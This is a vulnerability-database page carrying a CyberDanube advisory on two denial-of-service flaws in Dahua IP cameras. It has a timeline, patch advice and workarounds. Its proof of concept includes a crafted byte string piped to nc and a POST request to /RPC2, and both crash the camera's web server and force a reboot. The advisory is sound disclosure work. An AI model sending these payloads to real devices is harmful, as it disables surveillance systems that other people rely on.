Lucene search
+L

Dahua Camera Denial of Service

🗓️ 31 Aug 2026 00:00:00Reported by T. WeberType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 7 Views

Multiple DoS vulnerabilities in Dahua DH-IPC-HFW Series cameras up to V3.142.0000000.8.R.250826.

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-29115
11 Jul 202606:09
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-29116
11 Jul 202606:03
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-29114
11 Jul 202606:14
githubexploit
bdu_fstec
BDU FSTEC
The vulnerability of Dahua’s micro-programming software, related to uncontrolled reachability assertions, allows a intruder to trigger a service failure.
18 Jun 202600:00
bdu_fstec
circl
Circl
CVE-2026-29115
16 Jul 202619:00
circl
circl
Circl
CVE-2026-29116
10 Jun 202609:26
circl
cnnvd
CNNVD
Dahua多款产品 安全漏洞
10 Jun 202600:00
cnnvd
cnnvd
CNNVD
Dahua IPC和Dahua SD 安全漏洞
10 Jun 202600:00
cnnvd
cve
CVE
CVE-2026-29115
10 Jun 202606:08
cve
cve
CVE
CVE-2026-29116
10 Jun 202606:16
cve
Rows per page
CyberDanube Security Research 20260611-0
    -------------------------------------------------------------------------------
    title| Multiple Denial of Service
    product| Dahua DH-IPC-HFW Series
    vulnerable version| <=V3.142.0000000.8.R.250826
    fixed version| Versions build including and after 2026-03-26.
    CVE number| CVE-2026-29115, CVE-2026-29116
    impact| High
    homepage| https://www.dahuasecurity.com/
    found| 20.10.2025
    by| T. Weber, S. Eisenreich-Dietz
    | (Office Vienna)
    | CyberDanube Security Research
    | Vienna
    |
    | https://www.cyberdanube.com
    -------------------------------------------------------------------------------
    Vendor description
    -------------------------------------------------------------------------------
    "Dahua Technology is a world-leading video-centric AIoT solution and service
    provider. Committed to enabling a smarter society and better living, Dahua
    actively implements its Dahua Think#2.0 strategy, evolving from “Intelligence”
    to “Integrated Intelligence” to drive digital innovation and transformation for
    cities and enterprises. The company supports urban development by enhancing
    management efficiency, enabling autonomous city operations, upgrading public
    safety systems, and advancing ecological governance. In the enterprise sector,
    Dahua focuses on strengthening security systems, increasing operational
    productivity, and enabling data-driven decision-making to help businesses
    thrive."
    Source: https://www.dahuasecurity.com/aboutUs/introduction/0
    Vulnerable versions
    -------------------------------------------------------------------------------
    DH_IPC-HX5XXX-single-Riemann_MultiLang_PN_Stream4_V3.142.0000000.8.R.250826
    We know that more firmware versions are prone to this DoS vulnerabilities, but
    we cannot determine all exact versions. Other cameras from Dahua seems to not
    have a watchdog. Therefore, they do not trigger an automatic reboot and stay in
    a temporary bricked state.
    According to the vendor, the following series are affected:
    "Part of IPC、SD、NVR、XVR、EVS、VTO、VTH、ASI、TPC"
    See:
    https://www.dahuasecurity.com/about-dahua/trust-center/dahua-psirt/dhcc-sa-202606-001:-security-advisory-%E2%80%93-vulnerabilities-found-in-some-dahua-products
    https://materialfile.dahuasecurity.com/new_uploads_formal/soft/20260609/Affected_Models.pdf
    
    Vulnerability overview
    -------------------------------------------------------------------------------
    1) Authenticated Denial-of-Service (CVE-2026-29115)
    A temporary DoS (Denial of Service) condition can be triggered on the device.
    This leads to a reboot of the full system, which affects its availability.
    2) Unauthenticated Denial-of-Service (CVE-2026-29116)
    A Denial of Service condition can be triggered on the device, which is
    temporary on newer camera series but can also be persisten on older Dahua
    devices. This is due to the usage of a watchdog in the newer camera firmware.
    Proof of Concept
    -------------------------------------------------------------------------------
    1) Authenticated Denial-of-Service (CVE-2026-29115)
    The following command can be used to force the denial of service state:
    $ echo -ne 
    "\x20\x00\x00\x00\x44\x48\x49\x50\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x00\x00\x00\x00\x00\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x7b\x20\x0a"
     | nc 192.168.19.136 80
    The address 192.168.19.136 was used in this example as camera IP. After
    executing, the web server crashes and the device triggers a reboot. This takes
    a few minutes, resulting in black screens on the video surveillance systems on
    the windows clients for that time.
    2) Unauthenticated Denial-of-Service (CVE-2026-29116)
    An authenticated attacker can crash the webserver with a crafted request under
    the condition, that an SD card is inserted. If both pre-conditions are met, the
    following POST request can be used to kill the web server:
    -----------------------------------------------------
    POST /RPC2 HTTP/1.1
    Host: 192.168.19.136
    Content-Length: 139
    Accept-Language: de-DE,de;q=0.9
    Accept: application/json, text/plain, /
    Content-Type: application/json
    Origin: http://192.168.19.136
    Referer: http://192.168.19.136/
    Accept-Encoding: gzip, deflate, br
    Cookie: WebClientHttpSessionID=<Session-ID>
    Connection: keep-alive
    {"method":"workDirectory.factory.instance","params":{"name":"/mnt/dvr/mmc2p2_0aaaa"},"id":213,"session":"<Session-ID>"}
    -----------------------------------------------------
    The address 192.168.19.136 was used in this example as camera IP. After
    executing, the web server crashes and the device triggers a reboot. This takes
    a few minutes, resulting in black screens on the video surveillance systems on
    the windows clients for that time.
    Solution
    -------------------------------------------------------------------------------
    Install patches immediately.
    
    Workaround
    -------------------------------------------------------------------------------
    Restrict network access to the device in the infrastructure. Do not expose the
    web interface to the Internet or in public networks.
    
    Recommendation
    -------------------------------------------------------------------------------
    CyberDanube recommends to perform a white-box security assessment of the Dahua
    DH-IPC-HFWXXXX devices.
    
    Contact Timeline
    -------------------------------------------------------------------------------
    2025-12-18: Contacting Dahua PSIRT via cybersecurity () dahuatech com and sending
    advisory; No answer.
    2026-02-04: Asking for a timeline; No answer.
    2026-02-24: Asking for a timeline; No answer.
    2026-03-05: Asking for a timeline and including psirt () dahuatech com. PSIRT
    apologizes for inconvenience. The email was suspected to be
    filtered.
    2026-03-09: Exchanging PGP keys, trying to communicate back an forth. PSIRT
    did not received some emails from CyberDanube that were sent.
    2026-03-12: Re-sending advisory. PSIRT did not receive it.
    2026-03-16: Re-sending advisory. Confirmation from PSIRT.
    2026-03-17: PSIRT confirms the vulnerabilities and asked for shifting the
    disclosure date back by 90 days. Agreed due to the criticality of
    the finding and the mass-usage of this products.
    2026-03-20/23/27: Ongoing communication in both directions.
    2026-06-04: Asked for the exact disclosure date for the Dahua announcement.
    PSIRT responded that it will go public 2026-06-10.
    2026-06-11: Coordinated disclosure of vulnerabilities.
    
    Web: https://www.cyberdanube.com
    Twitter: https://twitter.com/cyberdanube
    Mail: research at cyberdanube dot com
    EOF T. Weber / @2026

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2026 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 48.7
EPSS0.00395
SSVC
7